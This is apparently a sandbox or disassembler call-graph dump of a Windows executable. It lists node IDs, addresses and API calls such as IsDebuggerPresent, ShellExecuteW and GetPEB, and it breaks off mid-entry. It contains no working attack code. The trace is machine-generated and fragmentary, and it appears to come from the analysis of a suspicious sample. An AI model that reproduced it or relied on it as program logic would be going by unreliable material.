86436 3d96d48 86422->86436 86424 3d99206 86439 3d98fe8 86424->86439 86442 3d9a238 GetPEB 86436->86442 86438 3d973d3 86438->86424 86440 3d98ff1 Sleep 86439->86440 86441 3d98fff 86440->86441 86443 3d9a262 86442->86443 86443->86438 86444 416454 86481 416c70 86444->86481 86446 416460 GetStartupInfoW 86449 416474 86446->86449 86448 4164cd 86450 4164d8 86448->86450 86565 41642b 46 API calls 3 library calls 86448->86565 86482 419d5a HeapCreate 86449->86482 86483 417c20 GetModuleHandleW 86450->86483 86453 4164de 86454 4164e9 __RTC_Initialize 86453->86454 86566 41642b 46 API calls 3 library calls 86453->86566 86502 41aaa1 GetStartupInfoW 86454->86502 86458 416503 GetCommandLineW 86515 41f584 GetEnvironmentStringsW 86458->86515 86462 416513 86521 41f4d6 GetModuleFileNameW 86462->86521 86464 41651d 86465 416528 86464->86465 86568 411924 46 API calls 3 library calls 86464->86568 86525 41f2a4 86465->86525 86468 41652e 86469 416539 86468->86469 86569 411924 46 API calls 3 library calls 86468->86569 86539 411703 86469->86539 86472 416541 86474 41654c __wwincmdln 86472->86474 86570 411924 46 API calls 3 library calls 86472->86570 86543 40d6b0 86474->86543 86477 41657c 86572 411906 46 API calls _doexit 86477->86572 86480 416581 type_info::_Type_info_dtor 86481->86446 86482->86448 86484 417c34 86483->86484 86485 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86483->86485 86573 4178ff 49 API calls _free 86484->86573 86487 417c87 TlsAlloc 86485->86487 86490 417cd5 TlsSetValue 86487->86490 86491 417d96 86487->86491 86488 417c39 86488->86453 86490->86491 86492 417ce6 __init_pointers 86490->86492 86491->86453 86574 418151 InitializeCriticalSectionAndSpinCount 86492->86574 86494 417d91 86582 4178ff 49 API calls _free 86494->86582 86496 417d2a 86496->86494 86575 416b49 86496->86575 86499 417d76 86581 41793c 46 API calls 4 library calls 86499->86581 86501 417d7e GetCurrentThreadId 86501->86491 86503 416b49 __calloc_crt 46 API calls 86502->86503 86504 41aabf 86503->86504 86504->86504 86506 416b49 __calloc_crt 46 API calls 86504->86506 86509 41abb4 86504->86509 86510 4164f7 86504->86510 86511 41ac34 86504->86511 86505 41ac6a GetStdHandle 86505->86511 86506->86504 86507 41acce SetHandleCount 86507->86510 86508 41ac7c GetFileType 86508->86511 86509->86511 86512 41abe0 GetFileType 86509->86512 86513 41abeb InitializeCriticalSectionAndSpinCount 86509->86513 86510->86458 86567 411924 46 API calls 3 library calls 86510->86567 86511->86505 86511->86507 86511->86508 86514 41aca2 InitializeCriticalSectionAndSpinCount 86511->86514 86512->86509 86512->86513 86513->86509 86513->86510 86514->86510 86514->86511 86516 41f595 86515->86516 86517 41f599 86515->86517 86516->86462 86592 416b04 86517->86592 86519 41f5c2 FreeEnvironmentStringsW 86519->86462 86520 41f5bb _memmove 86520->86519 86522 41f50b _wparse_cmdline 86521->86522 86523 416b04 __malloc_crt 46 API calls 86522->86523 86524 41f54e _wparse_cmdline 86522->86524 86523->86524 86524->86464 86526 41f2bc _wcslen 86525->86526 86530 41f2b4 86525->86530 86527 416b49 __calloc_crt 46 API calls 86526->86527 86532 41f2e0 _wcslen 86527->86532 86528 41f336 86599 413748 86528->86599 86530->86468 86531 416b49 __calloc_crt 46 API calls 86531->86532 86532->86528 86532->86530 86532->86531 86533 41f35c 86532->86533 86536 41f373 86532->86536 86598 41ef12 46 API calls __cftof2_l 86532->86598 86534 413748 _free 46 API calls 86533->86534 86534->86530 86605 417ed3 86536->86605 86538 41f37f 86538->86468 86540 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86539->86540 86542 411750 __IsNonwritableInCurrentImage 86540->86542 86624 41130a 51 API calls __cinit 86540->86624 86542->86472 86544 42e2f3 86543->86544 86545 40d6cc 86543->86545 86625 408f40 86545->86625 86547 40d707 86629 40ebb0 86547->86629 86554 40d737 86632 411951 86554->86632 86555 40d751 86644 40f4e0 SystemParametersInfoW SystemParametersInfoW 86555->86644 86557 40d75f 86645 40d590 GetCurrentDirectoryW 86557->86645 86559 40d767 SystemParametersInfoW 86560 40d78d 86559->86560 86561 408f40 VariantClear 86560->86561 86562 40d79d 86561->86562 86563 408f40 VariantClear 86562->86563 86564 40d7a6 86563->86564 86564->86477 86571 4118da 46 API calls _doexit 86564->86571 86565->86450 86566->86454 86571->86477 86572->86480 86573->86488 86574->86496 86577 416b52 86575->86577 86578 416b8f 86577->86578 86579 416b70 Sleep 86577->86579 86583 41f677 86577->86583 86578->86494 86578->86499 86580 416b85 86579->86580 86580->86577 86580->86578 86581->86501 86582->86491 86584 41f683 86583->86584 86588 41f69e _malloc 86583->86588 86585 41f68f 86584->86585 86584->86588 86591 417f77 46 API calls __getptd_noexit 86585->86591 86586 41f6b1 HeapAlloc 86586->86588 86590 41f6d8 86586->86590 86588->86586 86588->86590 86589 41f694 86589->86577 86590->86577 86591->86589 86595 416b0d 86592->86595 86593 4135bb _malloc 45 API calls 86593->86595 86594 416b43 86594->86520 86595->86593 86595->86594 86596 416b24 Sleep 86595->86596 86597 416b39 86596->86597 86597->86594 86597->86595 86598->86532 86600 413753 RtlFreeHeap 86599->86600 86604 41377c _free 86599->86604 86601 413768 86600->86601 86600->86604 86608 417f77 46 API calls __getptd_noexit 86601->86608 86603 41376e GetLastError 86603->86604 86604->86530 86609 417daa 86605->86609 86608->86603 86610 417dc9 __cftof2_l __call_reportfault 86609->86610 86611 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86610->86611 86614 417eb5 __call_reportfault 86611->86614 86613 417ed1 GetCurrentProcess TerminateProcess 86613->86538 86615 41a208 86614->86615 86616 41a210 86615->86616 86617 41a212 IsDebuggerPresent 86615->86617 86616->86613 86623 41fe19 86617->86623 86620 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86621 421ff0 __call_reportfault 86620->86621 86622 421ff8 GetCurrentProcess TerminateProcess 86620->86622 86621->86622 86622->86613 86623->86620 86624->86542 86626 408f48 ctype 86625->86626 86627 4265c7 VariantClear 86626->86627 86628 408f55 ctype 86626->86628 86627->86628 86628->86547 86685 40ebd0 86629->86685 86689 4182cb 86632->86689 86634 41195e 86696 4181f2 LeaveCriticalSection 86634->86696 86636 40d748 86637 4119b0 86636->86637 86638 4119d6 86637->86638 86639 4119bc 86637->86639 86638->86555 86639->86638 86731 417f77 46 API calls __getptd_noexit 86639->86731 86641 4119c6 86732 417f25 10 API calls __cftof2_l 86641->86732 86643 4119d1 86643->86555 86644->86557 86733 401f20 86645->86733 86647 40d5b6 IsDebuggerPresent 86648 40d5c4 86647->86648 86649 42e1bb MessageBoxA 86647->86649 86650 42e1d4 86648->86650 86651 40d5e3 86648->86651 86649->86650 86906 403a50 52 API calls 3 library calls 86650->86906 86803 40f520 86651->86803 86655 40d5fd GetFullPathNameW 86815 401460 86655->86815 86657 40d63b 86658 40d643 86657->86658 86659 42e231 SetCurrentDirectoryW 86657->86659 86660 40d64c 86658->86660 86907 432fee 6 API calls 86658->86907 86659->86658 86830 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86660->86830 86664 42e252 86664->86660 86666 42e25a GetModuleFileNameW 86664->86666 86668 42e274 86666->86668 86669 42e2cb GetForegroundWindow ShellExecuteW 86666->86669 86667 40d656 86671 40d669 86667->86671 86904 40e0c0 74 API calls __cftof2_l 86667->86904 86908 401b10 86668->86908 86672 40d688 86669->86672 86838 4091e0 86671->86838 86678 40d692 SetCurrentDirectoryW 86672->86678 86678->86559 86679 42e28d 86915 40d200 52 API calls 2 library calls 86679->86915 86682 42e299 GetForegroundWindow ShellExecuteW 86683 42e2c6 86682->86683 86683->86672 86684 40ec00 LoadLibraryA GetProcAddress 86684->86554 86686 40d72e 86685->86686 86687 40ebd6 LoadLibraryA 86685->86687 86686->86554 86686->86684 86687->86686 86688 40ebe7 GetProcAddress 86687->86688 86688->86686 86690 4182e0 86689->86690 86691 4182f3 EnterCriticalSection 86689->86691 86697 418209 86690->86697 86691->86634 86693 4182e6 86693->86691 86724 411924 46 API calls 3 library calls 86693->86724 86696->86636 86698 418215 type_info::_Type_info_dtor 86697->86698 86699 418225 86698->86699 86700 41823d 86698->86700 86725 418901 46 API calls __NMSG_WRITE 86699->86725 86702 416b04 __malloc_crt 45 API calls 86700->86702 86708 41824b type_info::_Type_info_dtor 86700->86708 86704 418256 86702->86704 86703 41822a 86726 418752 46 API calls 7 library calls 86703->86726 86706 41825d 86704->86706 86707 41826c 86704->86707 86728 417f77 46 API calls __getptd_noexit 86706->86728 86711 4182cb __lock 45 API calls 86707->86711 86708->86693 86709 418231 86727 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86709->86727 86713 418273 86711->86713 86715 4182a6 86713->86715 86716 41827b InitializeCriticalSectionAndSpinCount 86713->86716 86717 413748 _free 45 API calls 86715->86717 86718 418297 86716->86718 86719 41828b 86716->86719 86717->86718 86730 4182c2 LeaveCriticalSection _doexit 86718->86730 86720 413748 _free 45 API calls 86719->86720 86722 418291 86720->86722 86729 417f77 46 API calls __getptd_noexit 86722->86729 86725->86703 86726->86709 86728->86708 86729->86718 86730->86708 86731->86641 86732->86643 86916 40e6e0 86733->86916 86737 401f41 GetModuleFileNameW 86934 410100 86737->86934 86739 401f5c 86946 410960 86739->86946 86742 401b10 52 API calls 86743 401f81 86742->86743 86949 401980 86743->86949 86745 401f8e 86746 408f40 VariantClear 86745->86746 86747 401f9d 86746->86747 86748 401b10 52 API calls 86747->86748 86749 401fb4 86748->86749 86750 401980 53 API calls 86749->86750 86751 401fc3 86750->86751 86752 401b10 52 API calls 86751->86752 86753 401fd2 86752->86753 86957 40c2c0 86753->86957 86755 401fe1 86756 40bc70 52 API calls 86755->86756 86757 401ff3 86756->86757 86975 401a10 86757->86975 86759 401ffe 86982 4114ab 86759->86982 86762 428b05 86765 401a10 52 API calls 86762->86765 86763 402017 86764 4114ab __wcsicoll 58 API calls 86763->86764 86767 402022 86764->86767 86766 428b18 86765->86766 86769 401a10 52 API calls 86766->86769 86767->86766 86768 40202d 86767->86768 86770 4114ab __wcsicoll 58 API calls 86768->86770 86771 428b33 86769->86771 86772 402038 86770->86772 86774 428b3b GetModuleFileNameW 86771->86774 86773 402043 86772->86773 86772->86774 86775 4114ab __wcsicoll 58 API calls 86773->86775 86776 401a10 52 API calls 86774->86776 86777 40204e 86775->86777 86778 428b6c 86776->86778 86779 402092 86777->86779 86784 401a10 52 API calls 86777->86784 86786 428b90 _wcscpy 86777->86786 86780 40e0a0 52 API calls 86778->86780 86781 4020a3 86779->86781 86779->86786 86782 428b7a 86780->86782 86783 428bc6 86781->86783 86990 40e830 53 API calls 86781->86990 86785 401a10 52 API calls 86782->86785 86788 402073 _wcscpy 86784->86788 86789 428b88 86785->86789 86790 401a10 52 API calls 86786->86790 86794 401a10 52 API calls 86788->86794 86789->86786 86798 4020d0 86790->86798 86791 4020bb 86991 40cf00 53 API calls 86791->86991 86793 4020c6 86795 408f40 VariantClear 86793->86795 86794->86779 86795->86798 86796 402110 86800 408f40 VariantClear 86796->86800 86798->86796 86801 401a10 52 API calls 86798->86801 86992 40cf00 53 API calls 86798->86992 86993 40e6a0 53 API calls 86798->86993 86802 402120 ctype 86800->86802 86801->86798 86802->86647 86804 4295c9 __cftof2_l 86803->86804 86805 40f53c 86803->86805 86807 4295d9 GetOpenFileNameW 86804->86807 87672 410120 86805->87672 86807->86805 86809 40d5f5 86807->86809 86808 40f545 87676 4102b0 SHGetMalloc 86808->87676 86809->86655 86809->86657 86811 40f54c 87681 410190 GetFullPathNameW 86811->87681 86813 40f559 87692 40f570 86813->87692 87736 402400 86815->87736 86817 40146f 86820 428c29 _wcscat 86817->86820 87745 401500 86817->87745 86819 40147c 86819->86820 87753 40d440 86819->87753 86822 401489 86822->86820 86823 401491 GetFullPathNameW 86822->86823 86824 402160 52 API calls 86823->86824 86825 4014bb 86824->86825 86826 402160 52 API calls 86825->86826 86827 4014c8 86826->86827 86827->86820 86828 402160 52 API calls 86827->86828 86829 4014ee 86828->86829 86829->86657 86831 428361 86830->86831 86832 4103fc LoadImageW RegisterClassExW 86830->86832 87829 44395e EnumResourceNamesW LoadImageW 86831->87829 87828 410490 7 API calls 86832->87828 86835 40d651 86837 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86835->86837 86836 428368 86837->86667 86839 409202 86838->86839 86840 42d7ad 86838->86840 86896 409216 ctype 86839->86896 88101 410940 336 API calls 86839->88101 88104 45e737 90 API calls 3 library calls 86840->88104 86843 409386 86844 40939c 86843->86844 88102 40f190 10 API calls 86843->88102 86844->86672 86905 401000 Shell_NotifyIconW __cftof2_l 86844->86905 86846 4095b2 86846->86844 86848 4095bf 86846->86848 86847 409253 PeekMessageW 86847->86896 88103 401a50 336 API calls 86848->88103 86850 40d410 VariantClear 86850->86896 86851 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86851->86844 86853 4095f9 86851->86853 86852 42d8cd Sleep 86852->86896 86857 42e158 TranslateMessage DispatchMessageW GetMessageW 86853->86857 86855 42e13b 88122 40d410 VariantClear 86855->88122 86857->86857 86860 42e188 86857->86860 86859 409567 PeekMessageW 86859->86896 86860->86844 86863 46f3c1 107 API calls 86863->86896 86864 40e0a0 52 API calls 86864->86896 86865 46fdbf 108 API calls 86903 4094e0 86865->86903 86866 409551 TranslateMessage DispatchMessageW 86866->86859 86868 42dcd2 WaitForSingleObject 86869 42dcf0 GetExitCodeProcess CloseHandle 86868->86869 86868->86896 88111 40d410 VariantClear 86869->88111 86871 44c29d 52 API calls 86871->86903 86872 42dd3d Sleep 86872->86903 86873 47d33e 314 API calls 86873->86896 86876 4094cf Sleep 86876->86903 86878 42d94d timeGetTime 88107 465124 53 API calls 86878->88107 86880 40c620 timeGetTime 86880->86903 86883 465124 53 API calls 86883->86903 86884 42dd89 CloseHandle 86884->86903 86886 42de19 GetExitCodeProcess CloseHandle 86886->86903 86889 42de88 Sleep 86889->86896 86892 45e737 90 API calls 86892->86896 86895 408f40 VariantClear 86895->86903 86896->86843 86896->86847 86896->86850 86896->86852 86896->86855 86896->86859 86896->86863 86896->86864 86896->86866 86896->86868 86896->86872 86896->86873 86896->86876 86896->86878 86896->86892 86897 42e0cc VariantClear 86896->86897 86898 408f40 VariantClear 86896->86898 86896->86903 87830 4091b0 86896->87830 87888 40afa0 86896->87888 87914 4096a0 86896->87914 88041 408fc0 86896->88041 88076 408cc0 86896->88076 88090 40d150 86896->88090 88095 40d170 86896->88095 88105 465124 53 API calls 86896->88105 88106 40c620 timeGetTime 86896->88106 88121 40e270 VariantClear ctype 86896->88121 86897->86896 86898->86896 86899 401b10 52 API calls 86899->86903 86901 401980 53 API calls 86901->86903 86903->86865 86903->86871 86903->86880 86903->86883 86903->86884 86903->86886 86903->86889 86903->86895 86903->86896 86903->86899 86903->86901 88108 45178a 54 API calls 86903->88108 88109 47d33e 336 API calls 86903->88109 88110 453bc6 54 API calls 86903->88110 88112 40d410 VariantClear 86903->88112 88113 443d19 67 API calls _wcslen 86903->88113 88114 4574b4 VariantClear 86903->88114 88115 403cd0 86903->88115 88119 4731e1 VariantClear 86903->88119 88120 4331a2 6 API calls 86903->88120 86904->86671 86905->86672 86906->86657 86907->86664 86909 401b16 _wcslen 86908->86909 86910 4115d7 52 API calls 86909->86910 86912 401b63 86909->86912 86911 401b4b _memmove 86910->86911 86913 4115d7 52 API calls 86911->86913 86914 40d200 52 API calls 2 library calls 86912->86914 86913->86912 86914->86679 86915->86682 86917 40bc70 52 API calls 86916->86917 86918 401f31 86917->86918 86919 402560 86918->86919 86920 40256d __write_nolock 86919->86920 86921 402160 52 API calls 86920->86921 86923 402593 86921->86923 86931 4025bd 86923->86931 86994 401c90 86923->86994 86924 4026f0 52 API calls 86924->86931 86925 401b10 52 API calls 86927 4026d1 86925->86927 86926 401b10 52 API calls 86926->86931 86998 40d7c0 52 API calls 2 library calls 86927->86998 86930 4026db 86930->86737 86931->86924 86931->86926 86932 4026a7 86931->86932 86933 401c90 52 API calls 86931->86933 86997 40d7c0 52 API calls 2 library calls 86931->86997 86932->86925 86932->86930 86933->86931 86999 40f760 86934->86999 86937 410118 86937->86739 86939 42805d 86942 42806a 86939->86942 87055 431e58 86939->87055 86941 413748 _free 46 API calls 86943 428078 86941->86943 86942->86941 86944 431e58 82 API calls 86943->86944 86945 428084 86944->86945 86945->86739 86947 4115d7 52 API calls 86946->86947 86948 401f74 86947->86948 86948->86742 86950 4019a3 86949->86950 86952 401985 86949->86952 86951 4019b8 86950->86951 86950->86952 87661 403e10 53 API calls 86951->87661 86954 40199f 86952->86954 87660 403e10 53 API calls 86952->87660 86954->86745 86956 4019c4 86956->86745 86958 40c2c7 86957->86958 86959 40c30e 86957->86959 86962 40c2d3 86958->86962 86963 426c79 86958->86963 86960 40c315 86959->86960 86961 426c2b 86959->86961 86964 40c321 86960->86964 86965 426c5a 86960->86965 86967 426c4b 86961->86967 86968 426c2e 86961->86968 87662 403ea0 52 API calls __cinit 86962->87662 87667 4534e3 52 API calls 86963->87667 87663 403ea0 52 API calls __cinit 86964->87663 87666 4534e3 52 API calls 86965->87666 87665 4534e3 52 API calls 86967->87665 86971 40c2de 86968->86971 87664 4534e3 52 API calls 86968->87664 86971->86755 86976 401a30 86975->86976 86977 401a17 86975->86977 86979 402160 52 API calls 86976->86979 86978 401a2d 86977->86978 87668 403c30 52 API calls _memmove 86977->87668 86978->86759 86981 401a3d 86979->86981 86981->86759 86983 411523 86982->86983 86984 4114ba 86982->86984 87671 4113a8 58 API calls 3 library calls 86983->87671 86986 40200c 86984->86986 87669 417f77 46 API calls __getptd_noexit 86984->87669 86986->86762 86986->86763 86988 4114c6 87670 417f25 10 API calls __cftof2_l 86988->87670 86990->86791 86991->86793 86992->86798 86993->86798 86995 4026f0 52 API calls 86994->86995 86996 401c97 86995->86996 86996->86923 86997->86931 86998->86930 87059 40f6f0 86999->87059 87001 40f77b _strcat ctype 87067 40f850 87001->87067 87006 427c2a 87096 414d04 87006->87096 87008 40f7fc 87008->87006 87009 40f804 87008->87009 87083 414a46 87009->87083 87013 40f80e 87013->86937 87018 4528bd 87013->87018 87015 427c59 87102 414fe2 87015->87102 87017 427c79 87019 4150d1 _fseek 81 API calls 87018->87019 87020 452930 87019->87020 87602 452719 87020->87602 87023 452948 87023->86939 87024 414d04 __fread_nolock 61 API calls 87025 452966 87024->87025 87026 414d04 __fread_nolock 61 API calls 87025->87026 87027 452976 87026->87027 87028 414d04 __fread_nolock 61 API calls 87027->87028 87029 45298f 87028->87029 87030 414d04 __fread_nolock 61 API calls 87029->87030 87031 4529aa 87030->87031 87032 4150d1 _fseek 81 API calls 87031->87032 87033 4529c4 87032->87033 87034 4135bb _malloc 46 API calls 87033->87034 87035 4529cf 87034->87035 87036 4135bb _malloc 46 API calls 87035->87036 87037 4529db 87036->87037 87038 414d04 __fread_nolock 61 API calls 87037->87038 87039 4529ec 87038->87039 87040 44afef GetSystemTimeAsFileTime 87039->87040 87041 452a00 87040->87041 87042 452a36 87041->87042 87043 452a13 87041->87043 87044 452aa5 87042->87044 87045 452a3c 87042->87045 87046 413748 _free 46 API calls 87043->87046 87049 413748 _free 46 API calls 87044->87049 87608 44b1a9 87045->87608 87047 452a1c 87046->87047 87050 413748 _free 46 API calls 87047->87050 87052 452aa3 87049->87052 87053 452a25 87050->87053 87051 452a9d 87054 413748 _free 46 API calls 87051->87054 87052->86939 87053->86939 87054->87052 87056 431e64 87055->87056 87057 431e6a 87055->87057 87058 414a46 __fcloseall 82 API calls 87056->87058 87057->86942 87058->87057 87060 425de2 87059->87060 87061 40f6fc _wcslen 87059->87061 87060->87001 87062 40f710 WideCharToMultiByte 87061->87062 87063 40f756 87062->87063 87064 40f728 87062->87064 87063->87001 87065 4115d7 52 API calls 87064->87065 87066 40f735 WideCharToMultiByte 87065->87066 87066->87001 87069 40f85d __cftof2_l _strlen 87067->87069 87070 40f7ab 87069->87070 87115 414db8 87069->87115 87071 4149c2 87070->87071 87130 414904 87071->87130 87073 40f7e9 87073->87006 87074 40f5c0 87073->87074 87075 40f5cd _strcat __write_nolock _memmove 87074->87075 87076 414d04 __fread_nolock 61 API calls 87075->87076 87077 40f691 __tzset_nolock 87075->87077 87079 425d11 87075->87079 87218 4150d1 87075->87218 87076->87075 87077->87008 87080 4150d1 _fseek 81 API calls 87079->87080 87081 425d33 87080->87081 87082 414d04 __fread_nolock 61 API calls 87081->87082 87082->87077 87084 414a52 type_info::_Type_info_dtor 87083->87084 87085 414a64 87084->87085 87086 414a79 87084->87086 87358 417f77 46 API calls __getptd_noexit 87085->87358 87088 415471 __lock_file 47 API calls 87086->87088 87093 414a74 type_info::_Type_info_dtor 87086->87093 87091 414a92 87088->87091 87089 414a69 87359 417f25 10 API calls __cftof2_l 87089->87359 87342 4149d9 87091->87342 87093->87013 87427 414c76 87096->87427 87098 414d1c 87099 44afef 87098->87099 87595 442c5a 87099->87595 87101 44b00d 87101->87015 87103 414fee type_info::_Type_info_dtor 87102->87103 87104 414ffa 87103->87104 87105 41500f 87103->87105 87599 417f77 46 API calls __getptd_noexit 87104->87599 87106 415471 __lock_file 47 API calls 87105->87106 87108 415017 87106->87108 87110 414e4e __ftell_nolock 51 API calls 87108->87110 87109 414fff 87600 417f25 10 API calls __cftof2_l 87109->87600 87112 415024 87110->87112 87601 41503d LeaveCriticalSection LeaveCriticalSection _fseek 87112->87601 87114 41500a type_info::_Type_info_dtor 87114->87017 87116 414dd6 87115->87116 87117 414deb 87115->87117 87126 417f77 46 API calls __getptd_noexit 87116->87126 87117->87116 87119 414df2 87117->87119 87128 41b91b 79 API calls 12 library calls 87119->87128 87121 414ddb 87127 417f25 10 API calls __cftof2_l 87121->87127 87122 414e18 87124 414de6 87122->87124 87129 418f98 77 API calls 5 library calls 87122->87129 87124->87069 87126->87121 87127->87124 87128->87122 87129->87124 87133 414910 type_info::_Type_info_dtor 87130->87133 87131 414923 87186 417f77 46 API calls __getptd_noexit 87131->87186 87133->87131 87135 414951 87133->87135 87134 414928 87187 417f25 10 API calls __cftof2_l 87134->87187 87149 41d4d1 87135->87149 87138 414956 87139 41496a 87138->87139 87140 41495d 87138->87140 87142 414992 87139->87142 87143 414972 87139->87143 87188 417f77 46 API calls __getptd_noexit 87140->87188 87166 41d218 87142->87166 87189 417f77 46 API calls __getptd_noexit 87143->87189 87146 414933 type_info::_Type_info_dtor @_EH4_CallFilterFunc@8 87146->87073 87150 41d4dd type_info::_Type_info_dtor 87149->87150 87151 4182cb __lock 46 API calls 87150->87151 87152 41d4eb 87151->87152 87153 41d567 87152->87153 87162 418209 __mtinitlocknum 46 API calls 87152->87162 87164 41d560 87152->87164 87194 4154b2 47 API calls __lock 87152->87194 87195 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87152->87195 87155 416b04 __malloc_crt 46 API calls 87153->87155 87157 41d56e 87155->87157 87156 41d5f0 type_info::_Type_info_dtor 87156->87138 87158 41d57c InitializeCriticalSectionAndSpinCount 87157->87158 87157->87164 87160 41d59c 87158->87160 87161 41d5af EnterCriticalSection 87158->87161 87163 413748 _free 46 API calls 87160->87163 87161->87164 87162->87152 87163->87164 87191 41d5fb 87164->87191 87167 41d23a 87166->87167 87168 41d255 87167->87168 87179 41d26c __wopenfile 87167->87179 87200 417f77 46 API calls __getptd_noexit 87168->87200 87170 41d25a 87201 417f25 10 API calls __cftof2_l 87170->87201 87171 41d47a 87205 417f77 46 API calls __getptd_noexit 87171->87205 87172 41d48c 87197 422bf9 87172->87197 87176 41d47f 87206 417f25 10 API calls __cftof2_l 87176->87206 87177 41499d 87190 4149b8 LeaveCriticalSection LeaveCriticalSection _fseek 87177->87190 87179->87171 87185 41d421 87179->87185 87202 41341f 58 API calls 2 library calls 87179->87202 87181 41d41a 87181->87185 87203 41341f 58 API calls 2 library calls 87181->87203 87183 41d439 87183->87185 87204 41341f 58 API calls 2 library calls 87183->87204 87185->87171 87185->87172 87186->87134 87187->87146 87188->87146 87189->87146 87190->87146 87196 4181f2 LeaveCriticalSection 87191->87196 87193 41d602 87193->87156 87194->87152 87195->87152 87196->87193 87207 422b35 87197->87207 87199 422c14 87199->87177 87200->87170 87201->87177 87202->87181 87203->87183 87204->87185 87205->87176 87206->87177 87208 422b41 type_info::_Type_info_dtor 87207->87208 87209 422b54 87208->87209 87212 422b8a 87208->87212 87210 417f77 __cftof2_l 46 API calls 87209->87210 87211 422b59 87210->87211 87213 417f25 __cftof2_l 10 API calls 87211->87213 87214 422400 __tsopen_nolock 109 API calls 87212->87214 87217 422b63 type_info::_Type_info_dtor 87213->87217 87215 422ba4 87214->87215 87216 422bcb __wsopen_helper LeaveCriticalSection 87215->87216 87216->87217 87217->87199 87221 4150dd type_info::_Type_info_dtor 87218->87221 87219 4150e9 87249 417f77 46 API calls __getptd_noexit 87219->87249 87221->87219 87222 41510f 87221->87222 87231 415471 87222->87231 87223 4150ee 87250 417f25 10 API calls __cftof2_l 87223->87250 87230 4150f9 type_info::_Type_info_dtor 87230->87075 87232 415483 87231->87232 87233 4154a5 EnterCriticalSection 87231->87233 87232->87233 87234 41548b 87232->87234 87236 415117 87233->87236 87235 4182cb __lock 46 API calls 87234->87235 87235->87236 87237 415047 87236->87237 87238 415067 87237->87238 87239 415057 87237->87239 87244 415079 87238->87244 87252 414e4e 87238->87252 87307 417f77 46 API calls __getptd_noexit 87239->87307 87243 41505c 87251 415143 LeaveCriticalSection LeaveCriticalSection _fseek 87243->87251 87269 41443c 87244->87269 87247 4150b9 87282 41e1f4 87247->87282 87249->87223 87250->87230 87251->87230 87253 414e61 87252->87253 87254 414e79 87252->87254 87308 417f77 46 API calls __getptd_noexit 87253->87308 87256 414139 __flswbuf 46 API calls 87254->87256 87258 414e80 87256->87258 87257 414e66 87309 417f25 10 API calls __cftof2_l 87257->87309 87260 41e1f4 __write 51 API calls 87258->87260 87261 414e97 87260->87261 87262 414f09 87261->87262 87264 414ec9 87261->87264 87268 414e71 87261->87268 87310 417f77 46 API calls __getptd_noexit 87262->87310 87265 41e1f4 __write 51 API calls 87264->87265 87264->87268 87266 414f64 87265->87266 87267 41e1f4 __write 51 API calls 87266->87267 87266->87268 87267->87268 87268->87244 87270 414455 87269->87270 87274 414477 87269->87274 87271 414139 __flswbuf 46 API calls 87270->87271 87270->87274 87272 414470 87271->87272 87311 41b7b2 77 API calls 6 library calls 87272->87311 87275 414139 87274->87275 87276 414145 87275->87276 87277 41415a 87275->87277 87312 417f77 46 API calls __getptd_noexit 87276->87312 87277->87247 87279 41414a 87313 417f25 10 API calls __cftof2_l 87279->87313 87281 414155 87281->87247 87283 41e200 type_info::_Type_info_dtor 87282->87283 87284 41e223 87283->87284 87285 41e208 87283->87285 87286 41e22f 87284->87286 87291 41e269 87284->87291 87334 417f8a 46 API calls __getptd_noexit 87285->87334 87336 417f8a 46 API calls __getptd_noexit 87286->87336 87289 41e20d 87335 417f77 46 API calls __getptd_noexit 87289->87335 87290 41e234 87337 417f77 46 API calls __getptd_noexit 87290->87337 87314 41ae56 87291->87314 87295 41e23c 87338 417f25 10 API calls __cftof2_l 87295->87338 87296 41e26f 87298 41e291 87296->87298 87299 41e27d 87296->87299 87339 417f77 46 API calls __getptd_noexit 87298->87339 87324 41e17f 87299->87324 87302 41e215 type_info::_Type_info_dtor 87302->87243 87303 41e289 87341 41e2c0 LeaveCriticalSection __unlock_fhandle 87303->87341 87304 41e296 87340 417f8a 46 API calls __getptd_noexit 87304->87340 87307->87243 87308->87257 87309->87268 87310->87268 87311->87274 87312->87279 87313->87281 87315 41ae62 type_info::_Type_info_dtor 87314->87315 87316 41aebc 87315->87316 87319 4182cb __lock 46 API calls 87315->87319 87317 41aec1 EnterCriticalSection 87316->87317 87318 41aede type_info::_Type_info_dtor 87316->87318 87317->87318 87318->87296 87320 41ae8e 87319->87320 87321 41aeaa 87320->87321 87322 41ae97 InitializeCriticalSectionAndSpinCount 87320->87322 87323 41aeec ___lock_fhandle LeaveCriticalSection 87321->87323 87322->87321 87323->87316 87325 41aded __lseek_nolock 46 API calls 87324->87325 87326 41e18e 87325->87326 87327 41e1a4 SetFilePointer 87326->87327 87328 41e194 87326->87328 87330 41e1c3 87327->87330 87331 41e1bb GetLastError 87327->87331 87329 417f77 __cftof2_l 46 API calls 87328->87329 87332 41e199 87329->87332 87330->87332 87333 417f9d __dosmaperr 46 API calls 87330->87333 87331->87330 87332->87303 87333->87332 87334->87289 87335->87302 87336->87290 87337->87295 87338->87302 87339->87304 87340->87303 87341->87302 87343 4149ea 87342->87343 87344 4149fe 87342->87344 87388 417f77 46 API calls __getptd_noexit 87343->87388 87346 4149fa 87344->87346 87347 41443c __flush 77 API calls 87344->87347 87360 414ab2 LeaveCriticalSection LeaveCriticalSection _fseek 87346->87360 87350 414a0a 87347->87350 87348 4149ef 87389 417f25 10 API calls __cftof2_l 87348->87389 87361 41d8c2 87350->87361 87353 414139 __flswbuf 46 API calls 87354 414a18 87353->87354 87365 41d7fe 87354->87365 87356 414a1e 87356->87346 87357 413748 _free 46 API calls 87356->87357 87357->87346 87358->87089 87359->87093 87360->87093 87362 414a12 87361->87362 87363 41d8d2 87361->87363 87362->87353 87363->87362 87364 413748 _free 46 API calls 87363->87364 87364->87362 87366 41d80a type_info::_Type_info_dtor 87365->87366 87367 41d812 87366->87367 87368 41d82d 87366->87368 87405 417f8a 46 API calls __getptd_noexit 87367->87405 87370 41d839 87368->87370 87374 41d873 87368->87374 87407 417f8a 46 API calls __getptd_noexit 87370->87407 87371 41d817 87406 417f77 46 API calls __getptd_noexit 87371->87406 87373 41d83e 87408 417f77 46 API calls __getptd_noexit 87373->87408 87377 